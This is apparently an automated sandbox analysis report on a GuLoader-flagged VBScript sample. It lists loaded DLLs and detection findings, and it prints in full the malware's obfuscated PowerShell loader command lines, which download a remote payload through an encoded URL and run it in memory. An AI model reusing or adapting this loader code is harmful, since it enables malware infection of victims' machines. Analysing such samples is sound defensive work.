            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000006.00000002.2992466321.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2992466321.00000000080E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb. source: powershell.exe, 00000006.00000002.2992466321.00000000080E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straaleplet", "Unsupported parameter type 00000000")
            Yara detected GuLoader
            Source: Yara matchFile source: 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Strains)$gLObal:enomANIa = [SystEM.TeXT.ENcoDINg]::asCii.gETstrinG($LuFtanGrebS)$GlObal:acORNS=$enOManIa.sUbStRing($aGrEEs,$UnAnaLyTiC)<#Evacuates Oceanicity Sousafon Anacletica Bron
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Bagtrapperne $Chemoreception $Erhvervsdrivende), (Lemniscata @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hamald30 = [AppDomain]::CurrentDomain.GetAssem
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Semicolumnar)), $Ergatocracy247).DefineDynamicModule($Stiltlike, $false).DefineType($Bemestrer, $Skrdders, [System.MulticastDelegate])
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Strains)$gLObal:enomANIa = [SystEM.TeXT.ENcoDINg]::asCii.gETstrinG($LuFtanGrebS)$GlObal:acORNS=$enOManIa.sUbStRing($aGrEEs,$UnAnaLyTiC)<#Evacuates Oceanicity Sousafon Anacletica Bron
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers 